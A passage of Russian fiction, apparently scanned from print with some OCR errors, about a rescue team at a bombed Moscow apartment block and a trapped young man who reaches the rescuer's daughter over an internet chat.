щадке лежала, не шевелясь, та самая девушка, что понра- 
вилась Димке. Рядом с ней молча сидел ротвейлер. 

Димка встретился взглядом с соседом по этажу, недоу- 
менно пожал плечами и кивнул в сторону происходящего. 
Ответом был такой же непонимающий взгляд. За спиной 
блямкнул звук прихода сообщения. Димка дернулся было 
посмотреть, что же там написала Дана, но уж очень инте- 
ресно было узнать, чем же все закончится. Он мысленно 
махнул рукой на компьютер и вновь прильнул к перилам. И 
В ЭТОТ МОМЕНТ ФУРГОН ВЗОРВАЛСЯ. 


ЖЖЖЖЖЖЖЖ 


Еще издалека они увидели этот ужас. 

Каждый раз, прибывая на подобные происшествия, Теп- 
ляков удивлялся тому, насколько люди изобретательны в 
способах уничтожения друг друга. И насколько они жесто- 
ки. Трудно было сказать, какая сила уничтожила два подъ- 
езда огромного дома, сложив их, как карточный домик. Гру- 
да развалин огромной кучей накрыла собой половину дво- 
ра, несколько машин на стоянке и всю детскую площадку. 
Именно эта площадка, заваленная бетонными конструкци- 
ями, скрученными силой взрыва в немыслимые фигуры, 
заставила сероце Теплякова биться сильнее. Он увидел 
яркие, цветные качели, наклонившиеся под неестествен- 
ным углом, «грибок» с шляпкой, раскрашенной под мухо- 
мор, вставшую на дыбы песочницу... 

Автобус остановился там, куда смог доехать, - макси- 
мально близко к развалинам. По пути их уже тщательно 
проинструктировали на предмет того, чем придется зани- 
маться. Энтузиазма на лице Тепляков ни у кого не заметил - 
работать придется в основном с трупами. 

По правде сказать, за годы работы в МЧС он уже при- 
вык к смерти. He раз и не два Тепляков вытаскивал из раз- 
валин обезглавленные тела, неоднократно выносил на ру- 
ках людей, которые умирали в трех метрах от тех каменных 
могил, в которых сопротивлялись приходу этой самой 
смерти несколько часов. Вид крови и обезображенных тел 
не пугал его - просто добавлял в жизнь негатива. Он рабо- 
тал с мертвыми, как с материалом - вытаскивая из-под за- 
валов то, что осталось от некогда живых людей, он научил- 
ся абстрагироваться, иначе жизнь стала бы невыносимой... 

- Быстро, быстро! - крикнул начальник, стоя возле две- 
ри автобуса. Команда рванулась наружу, на ходу распреде- 
ляясь на мини-группы, каждая из которых имела свою 
собственную специализацию. Тепляков выскочил на улицу 
одним из последних, так как сидел в самом конце автобуса. 

Ребята на бегу надевали каски и присоединялись к тем, 
кто уже прибыл на место трагедии или находился здесь с 
самого начала. 

Жители дома, выбежавшие из уцелевших подъездов, 
раздирая пальцы в кровь, растаскивали те обломки, что 
были им по силам. Над местом трагедии клубилась пыль, 
всюду валялось бетонное крошево, силой взрыва разбро- 
санное по огромной территории. Тепляков, перескочив че- 
рез несколько покореженных плит, остановился напротив 


рухнувшей секции дома и осмотрелся. Неподалеку уже на- 
метилась маленькая площадка с лежащими на ней телами; 
некоторые были накрыты простынями или куртками, ос- 
тальные немигающими глазами смотрели в небо, простив- 
шись с миром. Тепляков быстро отвел глаза в сторону, но 
картина четко встала перед его глазами - плачущие над 
несколькими трупами женщины, крики о помощи, медлен- 
но бредущий между мертвыми человек с планшеткой и в 
белом халате, делающий пометки в каком-то документе. 
Уже заметно стемнело; двор освещался бликами мига- 
лок «Скорой помощи» и пожарных машин. Внезапно отку- 
да-то сбоку ударил мощный свет. Тепляков не стал огляды- 
ваться, зная прекрасно, что это прибыли прожекторные ус- 
тановки из их отряда. Пара лучей осветила подножие дома, 
остальные взяли в перекрестие провал между подъездами. 
Тепляков оглянулся по сторонам, отметил, что ребята 
уже втянулись в работу, сделал несколько шагов к разва- 
линам, внимательно смотря себе под ноги. Через пятнад- 
цать минут они с напарником вытащили первого человека, 
мужчину с переломанными ногами, который не кричал и не 
стонал, а только измученным взглядом смотрел на покачи- 
вающиеся лучи прожекторов у себя над головой и посто- 
янно облизывал губы. Они отнесли его к «неотложке», хи- 
рург кинул многозначительный взгляд на мужчину, потом 
на спасателей, что-то проговорил медсестре, Тепляков за 
общим шумом ничего не разобрал, да особо и не старался, 
прислушиваясь только к тому, что звучало в его наушнике. 
Та нырнула куда-то вглубь машины, вытащила шприц, уко- 
лола пострадавшего в ногу прямо сквозь брюки и постави- 
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ла галочку в тетради. Через пару секунд мужчина перестал 
облизывать губы, закрыл глаза и задышал ровнее. 

- Дальше! - кинул Тепляков напарнику и, развернув- 
шись, побежал назад. Они быстро вернулись, Тепляков по 
дороге пару раз споткнулся, больно ударившись ногой и 
даже захромав на несколько секуна; бульдозер по их ко- 
манде медленно, словно лист стекла, потянул лежавшую у 
края завала плиту. Показался овал лица, наполовину 
скрытый кровавым пятном. 

- Стой! - успел крикнуть Тепляков прежде, чем сверху 
стали сыпаться куски бетона. Машина замерла. Он подоб- 
рался сбоку, внимательно всмотрелся туда, где лежал че- 
ловек, махнул за спину напарнику и принялся определять, 
в какую сторону тянуть плиту, чтобы не причинить челове- 
ку больших страданий. Тем временем напарник подполз к 
пострадавшему почти вплотную, нашарил в аптечке на по- 
Ace шприц-тюбик, снял колпачок и, вытянув руку gO хруста 
в плече, постарался дотянуться до раненого. Тепляков за- 
мер; арматура рядом сильно раскачивалась, грозя рухнуть 
в самый неподходящий момент. 

Рука со шприцем замерла на полпути. Потом напарник 
медленно вернул ее, надел колпачок на иглу и сунул на- 
зад. Тепляков скрипнул зубами. 

- Тяни! - махнул он рукой бульдозеристу. Тот не стал 
долго раздумывать; трос натянулся, плита поползла в сто- 
рону. Откуда-то сверху рухнул покореженный диван - Теп- 
ляков едва успел увернуться и отскочить в сторону. Кто-то 
закричал из-за спины: «Берегисы» 

- Что там, Андрей? - спросил Тепляков у подошедшего 
напарника. Тот посмотрел назад, туда, где плита прочерти- 
ла в земле черную глубокую полосу, потом сказал, не по- 
ворачиваясь: 

- Там никого не было... живого... 

- Я видел лицо, - сказал Тепляков. - Правда, оно было 
залито кровью, но... 

- Там было... только лицо. Одна лишь голова. 
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Тепляков сам не понял, зачем он кивнул, потом тихо 
похлопал Андрея по плечу и вновь направился к развали- 
нам. 

Там уже вовсю работала бригада с собаками. Псы мета- 
лись по бетонной каше, ворочая носами разные тряпки, 
разрывая лапами то, что были в силах расшевелить. Сле- 
дом за каждой шло по два спасателя, отмечающие срлаж- 
ками подозрительные места. 

На подъездных путях показалось еще два крана и один 
экскаватор, доставленный на трейлере. Тепляков указал 
Анарею на ближайший к ним флажок, трепыхавшийся на 
ветру. Тот согласно кивнул головой, они вытащили из-за 
пояса маленькие кирки, поправили ларингосроны и двину- 
лись в его направлении. Очень хотелось вытащить хотя бы 
еще одного человека; но в то, что там есть живые, вери- 
лось с трудом. 
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...Димка не понял, что случилось потом - слишком уж 
сильным был удар, пришедшийся и по глазам, и по ушам. 
Небо и земля поменялись местами, что-то очень больно 
ударило снизу по ногам, а перила, крепкие железные пери- 
ла едва не обернулись вокруг его груди, словно веревоч- 
ные. Какой-то туман, осязаемый, режущий все тело невиди- 
мыми бритвами, окутал его. Плоскости и вертикали перес- 
тали существовать, стены, пол и потолок превратились в 
большие ворота в небо, которое вращалось перед ним 
быстрым и монотонным калейдоскопом с двумя цветами - 
голубым и белым. 


Димка боялся не то что 
пошевелиться - просто 
вдохнуть. 


Он Bgpyr увидел, как стены его квартиры, словно кар- 
тонные, валятся куда-то вниз, к входу в подъезд; как исчез 
его балкон, то ли взмыв в небо, то ли рухнув следом за сте- 
нами. Он услышал множество криков, доносящихся сразу 
отовсюду; неожиданно сбоку открылась чужая квартира, 
словно еще одна большая комната добавилась к жилищу 
Димки - это перестала существовать стена, разделявшая 
его и соседей. В комнате соседей раскачивалась из сторо- 
ны в сторону яркая люстра с множеством громко бренча- 
щих подвесок; внезапно она сорвалась с крюка и должна 
была разбиться об пол, но пола уже не было. Сосед в тем- 
но-коричневом полосатом халате вскрикнул и вдруг исчез 
вместе с плитой, ушедшей вниз. Следом за ним соскольз- 
нули, словно по льду, диван и несколько шкафов с посу- 
gon. 

На какое-то мгновение к Димке вернулось понимание 
того, где верх, а где низ. Он оказался с ног gO головы опу- 
тан тонкой белой шторой, которую принял за укрывший 
его туман. На пару секунд он замер посреди разрушенной 
квартиры, лишившейся балкона и стены, к которой балкон 
был прикреплен. Перекошенный пол заставлял сильно вы- 
гибаться в сторону, над головой скрипел чудом удержав- 
шийся абажур. 

Димка боялся не то что пошевелиться - просто вдох- 
нуть, ожидая, что именно этого не хватает дому для того, 
чтобы полностью развалиться. Сбоку скрипнул шкаср; 
Димка скосил на него глаза. Следом за звуком он уловил 
движение - распахнулась, словно нехотя, одна дверца, за- 
тем вторая, роняя на пол вешалки с рубашками и постель- 
ные принадлежности. 

Где-то далеко завыла сирена, потом еще одна. Дима пе- 
ренес вес тела на другую ногу, в голове созрела мысль: 
«Дверы» Надо было выбираться. Но едва он сделал пер- 
вые шаги вглубь комнаты, как откуда-то снизу, будто изда- 
лека, стал нарастать шум, как будто приближался поезд. 
Димка с широко раскрытыми глазами остановился рядом с 
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компьютерным столом и зачем-то положил руку на спинку 
кресла. И когда он понял, что пол уходит у него из-под ног, 
он прыгнул куда-то вверх, стараясь ухватиться за воздух... 

Спустя секунду плита, образующая пол в его квартире, 
обломившись почти у самого края и выставив наружу по- 
кореженные усы арматуры, упала и смешалась с несколь- 
кими такими же плитами в основании подъезда. Потолок 
провис, словно резиновый; испытывающий страшные нап- 
ряжения материал затрещал, но выдержал. Через пару 
мгновений обломился и он, унося за собой все, что оста- 
лось от Димкиной квартиры, кроме маленького уголка с 
компьютерным столом и креслом, на котором оглушенный, 
но живой, свернувшись в немыслимой позе, лежал сам 
Димка. 

Воздух, насыщенный густой бетонной пылью, рвался в 
легкие. Димка откашлялся далеко не с первой попытки, 
выплевывая из себя чуть ли не куски бетона. Глаза сами 
нашли где-то в уголках образовавшегося каменного гроба 
точки, из которых внутрь пробивался свет с улицы. Он по- 
пытался понять, где же он и в какой позе лежит. То, что 
под ним кожаное кресло с широкой мягкой спинкой, было 
понятно. Но как в нем повернуться, чтобы так не болела 
поясница... 

Димка сделал несколько попыток повернуть себя в 
кресле - безрезультатно. И во время одной из них, уже от- 
чаявшись, что так и просидит в этой могиле чуть ли не 
вверх ногами до прихода спасателей (а в их приходе он ни 
секунды не сомневался!), OH варуг заметил, что откуда-то 
сбоку пробивается свет. Он выгнул шею. 

- Ох, ни хрена себе! - с трудом произнес он охрипшим 
OT надсадного кашля голосом, видя, что компьютер, целый 
и невредимый, остался включенным - судя по всему, какие- 
то кабели, ответственные за освещение подъезда, не пов- 
редились. - Тоже вариант... 

Пошевелив плечами, он сумел повернуться к экрану бо- 
ком, потом вытащил из-под себя руку и положил ее на 
стол, усеянный бетонной крошкой. Мышка свисала со сто- 
ла на проводе - оставалось надеяться, что она не постра- 
дала. 

- Ведь я... я могу дать о себе знать! - произнес он в ти- 
шине своего каменного саркосбрага. - Если, конечно, теле- 
фонные провода тоже не пообрывало... 

Оставалось надеяться на то, что короб для электропро- 
водки и телефонных кабелей был один. Взгляд сам скольз- 
нул в трей, где горел значок оставшегося в живых подклю- 
чения, на другом конце которого сидела сейчас неведомая 
Дана в ожидании собеседника. 

«Ну, так на кого ты хочешь быть похожим?» - прочитал 
Димка ее вопрос, пришедший перед самым взрывом, об- 
лизнул пересохшие губы, протянул правую руку к клавиа- 
туре и едва хотел набрать ответ, как варуг откуда-то из об- 
ласти поясницы пришла жуткая, испепеляющая, не остав- 
ляющая никаких надежд БОЛЬ... Он, словно щенок, взвизг- 
нул от этого приступа, потом резко перешел на хрип, глаза 
широко раскрылись, вены на шее и висках стали похожими 
на канаты... 

Приступ продолжался не более нескольких секунд. 
Ушел он так же внезапно, как и появился, оставив о себе 
память в виде частого пульса, мокрых ладоней и ужаса, не- 
передаваемого и неповторимого. Димка попытался улыб- 
нуться самому себе и подбодрить хоть каким-нибудь сло- 
вом, но все звуки застряли у него в горле вместе с пылью, 
когда он попытался пошевелить ногами. OH ПОНЯЛ, ЧТО У 
НЕГО СЛОМАНА СПИНА. 

Глаза закрылись, забытье окутало его. Вопрос Даны ос- 
тался без ответа. 

...OH струдом понял, что пришел в себя. Глаза, слипши- 
еся от пота, с трудом раскрылись. Даже то количество све- 
та, что попадало в его каменную ловушку, резануло зрач- 
ки, он сощурился и отчетливо увидел перед собой экран 
компьютера, по которому летали огромные цифры, указы- 
вающие время. 

- Двадцать тридцать семь, - прошептал Димка. - Скоро 
спать ложиться... 


OH шевельнул затекшими руками, зацепил мышку. 
Цифры мгновенно исчезли с экрана, показав содержимое 
рабочего стола и издевательскую в теперешней ситуации 
обоину с Кармен Электра и ее обнаженным бюстом. Димка 
несколько раз зажмурил и раскрыл глаза, стараясь настро- 
ить фокус как можно точнее. Постепенно он привык к тем- 
ноте и попытался рассмотреть, где же он оказался. Угол 
комнаты, в котором стоял его трехэтажный компьютерный 
стол, уцелел. Похоже, единственный из всех углов его 
квартиры - все остальное благополучно провалилось в 
тартарары... 

- Бен Ладены хреновы, - сквозь зубы процедил Димка, 
вытерев со лба крошки, перемешанные с потом. - Хоть бы 
им что-нибудь тоже на башку упало... Сволочи! 

Часть потолка, обломившись и изогнувшись на армату- 
ре, образовала над ним некое подобие треугольного шат- 
ра, наглухо закрыв его сзади от образовавшейся пропасти 
глубиной в шесть этажей. И попутно - во время его кульби- 
та в кресло - сломала ему позвоночник. 

Волей судьбы он уцелел, уцелел, чтобы не иметь Npegc- 
тавления о том, увидит ли он когда-нибудь солнечный свет. 
Димка покрутил головой - осторожно, чтобы не взметнулась 
от поясницы к мозгу еще одна волна боли. В шее что-то 
хрустнуло - Димка напрягся и едва не крикнул, - и наступило 
какое-то благостное состояние, которое посещает умираю- 
щих в редкие минуты без боли, когда снова хочется жить... 

Дима взглянул на монитор. Дана по-прежнему была он- 
лайн. Он вздохнул, медленно и глубоко, стараясь не нады- 
шаться висящей в воздухе пыли, а потом указательным 
пальцем правой руки быстро набрал: 

- Ты где живешь? 

- В Москве, - пришел через пару минут ответ. Димка 
прочитал его, кивнул и продолжил: 

- Район? 

- Марьина роща, - снова достаточно быстро ответила 
Дана. 

- Может быть, не врет, - сказал сам себе Димка. - Она 
ответила быстро, а значит машинально. 

- У меня тут проблема нарисовалась, - отстучал он. А 
потом подумал: как он ей об этом расскажет? Вот просто 
возьмет и скажет, что под ним только что пол провалился? 

Он на секунду представил себя на месте Даны: как нек- 
то из онлайна шлет ему подобное заявление о теракте, 
рухнувших стенах и прочую ерунду. 

- Вряд ли я сразу бы поверил, - скептически сказал он 
сам себе и Bgpyr понял одну очень интересную вещь. 
Вещь настолько любопытную, что на какое-то время он за- 
был о Дане и Марьиной роще. 

ОН ВООБЩЕ НЕ ПОДДАЛСЯ ПАНИКЕ. OH не стал дико 
орать в надежде, что кто-нибудь его услышит; он не стал 
пытаться производить шум, стучать в стены, не стал пол- 
зать по своей ловушке в поисках выхода. Он воспринял 
все происходящее как экстрим, не более того. Он пытается 
общаться с кем-то по интернету после того, как человек 
пятьдесят или более были раздавлены несчетным весом 
бетонных плит; он даже не ждет помощи, поскольку ни на 
секунду не сомневается в ее появлении. 

И как только он это понял, паника охватила его. Сердце 
застучало безумной птицей, моментально взмокли ладони 
и пересохли губы. Глаза заметались во тьме, постоянно на- 
тыкаясь на яркий прямоугольник экрана. 

- Мне должны помочь, меня вытащат, вытащат, - забор- 
мотал он, не имея сил закричать и помня о том, что крик 
может вызвать новый приступ боли в спине. - Они придут... 

Он свято верил в три буквы - «МЧС». Он, как и все, кто 
смотрит телевизор, знал - придут, откопают, спасут. Вот 
только доживет ли он сам до этого, Димка, конечно же, не 
знал. 

Руки сами упали на клавиатуру. 


ЖЖЖЕЖЖЖЖЖ 


Тело на обломке плиты на уровне третьего этажа они 
увидели почему-то не сразу. Вроде бы и свет бил туда 


непрерывно, и люди, работавшие на самой вершине за- 
вала, были от него в паре метров - и, тем не менее, чело- 
век пролежал там почти сорок минут после прибытия ко- 
манды, прежде чем одна из собак на самой верхотуре, ед- 
ва не проваливаясь в промежутки между покореженны- 
ми бетонными блоками, вдруг не задрала голову кверху и 
не завыла. 

Несколько спасателей кинули на собаку сердитые 
взгляды, считая, что животное должно быть обучено рабо- 
тать молча и не проявлять своих собачьих эмоций по отно- 
шению к мертвым. Тепляков со всеми, кто стоял рядом, то- 
же посмотрел на овчарку и понял, что она не просто воет - 
она указывает всем на что-то. 

Крикнув прожектористу, чтобы тот поправил луч, он 
приблизился к участку, на котором теперь видел что-то 
странное, похожее на ногу, свисающую с самого края пли- 
ты. Свет спустя пару секунд пополз в сторону, выделил в 
желтый круг линию третьего этажа, и Тепляков увидел там 
человека, лежащего, похоже, на спине, на самом краю безо 
всякого движения. 

Спасатель рванулся вверх, на ходу разматывая на поя- 
се веревку и готовя альпинистское снаряжение. Добраться 
go пострадавшего было делом нехитрым - сложнее было 
на месте оказать какую-то помощь и спустить тело вниз, не 
нанеся ему никаких других повреждений. 

- Андрей, налаживай спуск! - крикнул он напарнику. Тот 
вызвал подмогу, один из кранов протянул к Теплякову 
стрелу, но достать вплотную не сумел. Тепляков угрюмо 
посмотрел на раскачивающуюся в двух метрах от него 
лестницу и отрицательно покачал головой. 


Работа по спасению шла уже 
полным ходом; внизу 
развернулся штаб 
бригады МЧС. 


Тем временем наверх к нему подали щит; Тепляков ос- 
мотрел раненого мужчину, отметил у него переломы рук, 
вколол наркотик из аптечки и, сидя на самом краю плиты, 
принялся прилаживать щит под спину пострадавшего. 
Мужчина изредка издавал тонкие, немужские стоны, вы- 
нуждая Теплякова работать осторожно и одновременно 
спешить; он очень боялся не успеть спустить раненого 
ВНИЗ. 

Завязывая узлы над телом пострадавшего и прикреп- 
ляя его как можно надежнее к щиту, он поглядывал по сто- 
ронам. Работа по спасению шла уже полным ходом; внизу 
развернулся штаб бригады МЧС, откуда шло общее руко- 
водство операцией. Около двадцати бригад «Скорой помо- 
щи» носились взад-вперед, отправляя раненых в ближай- 
шие больницы. Уцелевшие жильцы дома были выведены 
из своих квартир и расположены примерно в полукиломет- 
ре от места происшествия на берегу озера; возле них неот- 
лучно дежурила пара бригад медиков и наряд милиции. 

С десяток флажков на завале было еще не обследова- 
но. Тепляков представил себе, что там, внутри, под этими 
плитами лежат люди, ожидающие помощи; ему захотелось 
своими руками задушить ту сволочь, что взорвала здесь 
бомбу. Найти и задушить, чтобы видеть, как в его глазах 
страх смерти сменяется туманом, как синеет лицо, как выс- 
тупает пена на губах... Но никакая смерть террориста не 
сравнится с тем, что творится сейчас здесь, на этих разва- 
линах, никакая смерть не вернет к жизни тех, кто остался 
погребен тут и кого смогут вытащить - Тепляков прекрасно 
знал статистику - не ранее вторых-третьих суток от начала 
спасательных работ. 

Там, под флажками, лежали сейчас те, кто жил на са- 
мых верхних этажах и на кого упало не так уж и много 
плит; основная же масса людей, первые три-четыре этажа, 
оказалась похороненной на большой глубине. Вот к одной 
отметке дотянулась та стрела крана, что не смогла помочь 
Теплякову, к небу аккуратно взмыла ставшая словно кар- 
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тонной плита, луч прожектора проводил ее до самого соп- 
рикосновения с землей в паре десятков метров в стороне. 
Фонарики на шлемах освещали спасателям то, что творит- 
ся там, внизу, в клубящейся пыли и мраке; один из спасате- 
лей что-то увидел, крикнул остальным. Потом он исчез в 
невидимом отсюда тоннеле, образованном обломками go- 
ма; через некоторое время появился снова, с трудом выка- 
рабкался наружу, прижал ларингосфоны к шее поплотнее и 
что-то сообщил в штаб, после чего они с напарником взя- 
лись за веревку и потянули. Примерно пару минут спустя - 
Тепляков к тому времени заканчивал фиксировать мужчи- 
ну и проверял узлы на надежность - над поверхностью за- 
вала показалась женская голова, склоненная набок. Длин- 
ные волосы были в беспорядке разбросаны по лицу; спаса- 
тели, подсунув руки ей под мышки, вытащили женщину и 
аккуратно уложили на подготовленный щит. Что-то у них 
там не падилось, они разорвали на женщине домашний ха- 
лат, обнажив окровавленное тело, один из спасателей на- 
ложил повязку на плечо, после чего, взяв щит, они приня- 
лись спускаться по склону завала, на котором уже светя- 
щимися вешками была обозначена тропа для безопасного 
прохода. Через десять минут женщина на «неотложке» бы- 
ла отправлена в больницу. 

Тепляков отметил про себя успех товарищей, крикнул 
Андрею, чтобы тот подстраховал внизу; после этого подто- 
лкнул щит к краю плиты, дождался, когда тот своим весом 
примет полувертикальное положение и принялся осторож- 
но отпускать веревку. Щит постепенно опускался, Андрей 
сумел кончиками пальцев достать до него и направить его 
движение. 


Чертовски хотелось сесть в 
кресле поудобнее, а не висеть в 
нем на боку, но его саркосраг не 

позволял пошевелиться телу. 


- Принял! - крикнул он наверх. - Спускайся, надо торо- 
питься! 

Тепляков выпрямился на своем маленьком пятачке и 
осмотрелся еще раз, пытаясь увидеть то, что не было вид- 
но другим снизу. 

Ничего особенного ему разглядеть не удалось: горы бе- 
тонных обломков, покореженная мебель, несколько лест- 
ничных пролетов, уцелевших при падении; отовсюду слы- 
шались крики и плач, люди рвались на место гибели их 
родственников готовые голыми руками разбирать завалы. 
Милиция оттаскивала их в сторону, медики направо и нале- 
во кололи успокаивающие лекарства. Тепляков вздохнул и 
спустился вниз, внимательно глядя под ноги. 

В наушниках слышались переговоры штаба и руководи- 
телей групп, работающих на месте. Тепляков узнал, что 
спасено лишь десять человек, да и то лишь те, кто оказал- 
ся практически на самом верху завала. Пять или шесть че- 
ловек переговариваются из-под плит со спасателями, но 
подобраться к ним не представляется возможным. А на 
детской площадке лежали уже семь трупов... 

- Андрей, - позвал он напарника, - идем к желтому 
qpnamky, туда, где собака бесится! 

Они приблизились к визжащей овчарке, оттеснили ее в 
сторону, чему она сильно сопротивлялась, что даже приш- 
лось позвать собаковода и попросить убрать животное. 
Из-под развалин слышался плач то ли ребенка, то ли моло- 
дой женщины. Спасатели переглянулись и принялись рас- 
таскивать руками то, что можно было поднять силами двух 
человек. Кран, вызванный ими, уже тянул к ним свою стре- 


лу... 
ho RK KK 
- Меня Ha самом деле зовут Дима, - напечатал он. - В 


моем доме только что произошел взрыв. 
- Не может быть-- был ответ. - Ты так шутишь? 
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- Какие тут шутки? - печатал Димка. - Возле подъезда 
взорвался грузовик, я сам видел... 

- Как же ты сам видел? Дом же взорвался. А ты как 
уцелел? Хватит врать, а то я сейчас отключусь! 

- Нет, не отключайся! - едва не закричал у компьютера 
Дима. - Ты ведь не врешь, что живешь в Москве, правда? 

- Правда. 

- Позвони в милицию или еще куда-нибудь! Позвони в 
МЧС! 

- Позвоню - и что я им скажу? Как я представлюсь? 
Как человек, которому в интернете кто-то сказал, что его 
дом рухнул только что? 

ау 

- Воти ну. Кто мне поверит? Да и я тебе не очень-то ве- 
рю. 

- Я не знаю, как мне убедить тебя. Я живу на шестом 
этаже этого дома. Вокруг во время взрыва все рухнуло, я 
уцелел чудом на маленьком куске пола, рядом с компьюте- 
ром. Соединение, которое было установлено с тобой, не 
оборвалось. 

- Фантастика. Не очень-то верится... 

- Я сам с трудом верю в происшедшее. У меня какие-то 
проблемы со спиной, очень сильно болит. Боюсь, что могу 
в любой момент отключиться. Чем быстрее ты позвонишь, 
тем лучше. 

- Говори адрес. У меня есть возможность проверить, 
врешь ты или нет. 

- Как? 

- Адрес! 

Димка напечатал. Наступила пауза. «Как она собирает- 
ся проверить мои данные? - удивился он про себя. - Ведь 
можно только поверить в них, и все. И она не может нику- 
да позвонить, потому что телефон занят соединением со 
мной. Хотя мало ли какая у нее дома техника...» 

- Ты еще там? - появился вопрос. 

- Смешно. Мне отсюда деться некуда. Метр на метр мо- 
гилка. 

- Так какой этаж? 

- Шестой. 

- Где ты находишься в комнате? 

Димка вспомнил планировку квартиры и набрал: 

- Правый дальний угол, если стоять лицом к дому. 

- Номер квартиры? 
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Снова возникла пауза. У Димы сложилось впечатление, 
что Дана по ту сторону общается с кем-то. 

Снова заболела спина, несильно, издалека откуда-то 
стали приходить импульсы боли. Hor он уже давно не 
чувствовал; чертовски хотелось сесть в кресле поудобнее, 
a He висеть в нем на боку, но его саркосраг не позволял по- 
шевелиться телу. 

Наверное, он потерял сознание на несколько минут, по- 
тому что, открыв глаза, он увидел сразу несколько вопро- 
сов: «Ау? Ты где?», пришедших один за другим. 

- Я все еще здесь,- ответил OH Дане. - Ты что-нибудь 
предприняла? 

- Да. Ты не врешь. Я переживаю за тебя, Дима. Тебе 
помогут, - прочитал он ответ. 

- Когда? 

- Не знаю. Скоро. Жди. 

И спустя минуту молчания: 

- Имы с тобой встретимся. Я хочу тебя увидеть. Не про- 
TUB? 

- Нет. Спасибо тебе, Дана. Kak тебе это удастся? 

- Я сама решу как. Ты там держись, Димка. Жизнь про- 
должается. Мне тоже иногда бывает паршиво - конечно, не 
так, как тебе сейчас, но все-таки. Не сдавайся. 

- Не сдамся. Вот только пить хочется ужас!!! Тут все в 
пыли, такое чувство, будто я ее наелся. 

Он отправил последнее сообщение, задумался на мгно- 
венье и варуг понял, что что-то не так. Экран замерцал, по- 
rac, на мгновенье вспыхнул вновь, чтобы выключиться 
навсегда. Стало темно и тихо, перестал шуметь кулер под 
CTONOM. 


Снаружи доносились шум, Димка разбирал рычание 
тракторов, вой сирен, чьи-то крики. Все это не складыва- 
лось в общую картину, казалось каким-то отрывочным, не- 
реальным, словно звуковая дорожка к какому-то незнако- 
мому фильму. 

А потом он потерял сознание. 


ЖЖЖЖЖЖЖЖ 


Это был ребенок. Они вытащили его минут за двадцать, 
аеще через пятнадцать минут их отозвали для реабилита- 
ции. Они с Анареем спустились с завала к штабу в распо- 
ряжение медиков. Со здоровьем у них после пары часов 
работы было все в порядке, никто не получил травму, поэ- 
тому их просто отправили в походную столовую. 

Они вошли в вагончик, присели за стол и молча приня- 
лись есть. Пища казалась им абсолютно безвкусной; каж- 
дый из них видел сквозь стены маленькое кладбище на 
детской площадке. Изредка они поглядывали друг на дру- 
га, избегая смотреть в глаза; хотелось молчать и никак не 
комментировать происходящее. Эмоции здесь - табу. 

Когда они заканчивали ужин, у Теплякова зазвонил со- 
товый. Он нехотя полез в карман, проклиная себя за то, что 
не оставил телефон дома. На определителе горел номер 
его дочери. 

- Интересно,- хмыкнул он, в душе радуясь звонку. - 
Слушаю, Дашенька... Да, я работаю, неспокойно в городе... 
Где? А ты откуда знаешь, что я здесь? Я думал, в новостях 
еще не успели сообщить... Кто сказал? Кто? 

Он удивленно взглянул на Андрея. Тот заинтересован- 
но смотрел на напарника, ожидая окончания разговора. 

- Парень по имени Дима? Ну... Да... Шестой этаж? Да 
тут рухнуло все, начиная с девятого! Квартира номер де- 
вятнадцать? Точно шестой? Ну, Дашка, если это все 
вранье, не знаю, что с тобой сделаю! Все, пока. 

Аноарей недоуменно поднял брови. 

- Шестой этаж, квартира номер девятнадцать. 

- Это я слышал, - произнес Аноарей. - И что же там, на 
этом шестом этаже? 

- Парень. Дима. Живой/- отчеканил Тепляков. - И 90 
сих пор сидит за компьютером, общаясь с моей дочерью 
по интернету. Слушай, за кого она меня принимает? И этот 
виртуальный Дима - он вообще представляет, что тут 
просто никто не может уцелеть! А те, кого мы находим жи- 
выми, отмечены какой-то ангельской печатью, ибо выжить 
здесь просто невозможно! 

Он вышел из вагончика на улицу и поднял глаза на- 
верх, туда, где зиял провал между двумя стоящими частя- 
ми дома. Лучи прожекторов, взяв дом в перекрестие, уже 
не выпускали его из своих цепких объятий. Тепляков приг- 
ляделся к стенам, отсчитал шесть этажей и принялся вни- 
мательно разглядывать то, что когда-то могло быть кварти- 
рой под номером девятнадцать. 

Видно было не очень хорошо, пришла мысль найти би- 
нокль, но Тепляков решил проверить информацию иначе. 
Он кивнул Андрею, и они направились к завалу, предвари- 
тельно отметившись у диспетчера штаба. 

Сначала Тепляков решил осмотреть все снизу, чтобы 
понять, реально ли кому-то сейчас остаться на уровне шес- 
того этажа. Когда они с Андреем подобрались поближе че- 
рез развалины дома и встали на их вершине, Тепляков по- 
нял, что дочь не обманули. Там определенно мог кто-то на- 
ходиться. Огрызок перекрытия, метра два на полтора в по- 
перечнике, мог предоставить убежище оля одного челове- 
ка. 

- Очень интересно, - задумчиво сказал Андрей. - Если 
бы не твоя дочь... Кому придет в голову поднять глаза к 
небу и рассуждать, не завис ли кто-то между этажами? 

- Случайность... - протянул Тепляков. - Какова вероят- 
ность того, что этот парень мог общаться с моей дочерью 
через интернет после взрыва? 

- Нулевая,- ответил Андрей. 


- Это единственный аргумент в пользу того, что все это 
вранье чистой воды. Все остальное за то, что этот парень 
действительно там. А вот жив ли? 

Телефон зазвонил вновь. Тепляков, не глядя, нажал 
кнопку. 

- Да, Даша... Что? Черт... 

Он выключил телефон, спрятал его во внутренний кар- 
ман, посмотрел на Андрея и сказал: 

- Он замолчал, а потом отключился... 

Напарник молча кивнул в сторону. Тепляков посмотрел 
туда и увидел, как экскаватор, разгребая край завала, вы- 
воротил из земли кучу разных кабелей, среди которых на- 
верняка были и телефонные. 

Тепляков еще раз задрал голову кверху. 

- Два пути, - задумчиво сказал он. - Подняться отсюда 
либо спуститься с крыши. Что скажешь? 

- Ну, альпинист у нас ты, - развел руками Андрей. - Я 
буду страховать в любом случае. Если спустишься сверху, 
то придется эвакуировать на крышу. Там бы вертолет не 
помешал, но кто его сюда вызовет? 

- Ты,- сказал Тепляков. - А я беру щит, поднимаюсь на- 
верх и делаю все остальное. 

- Вытащишь? Сам? - засомневался Андрей. 

- Вытащу, не бойся, - ухмыльнулся напарник. - И зна- 
ешь, дочь сказала, что приедет сюда, чтобы посмотреть на 
того, кого мы вместе с ней спасаем. Встреть ее; главное, 
чтобы она тут поменьше всего увидела... Я же не могу ей 
по телефону запретить, а она у меня уже взрослая, самос- 
тоятельная. Короче, проведешь в диспетчерскую, пусть 
там сидит. 


Лучи прожекторов, взяв GOM 
в перекрестие, уже не 
выпускали его из своих 
цепких обьятий. 


- Понял,- кивнул Андрей и, прижав ларингофоны к 
шее, сообщил в штаб о предстоящей операции на крыше. 

Тепляков, не дожидаясь окончания разговора, напра- 
вился к ближайшему подъезду, держа под мышкой поли- 
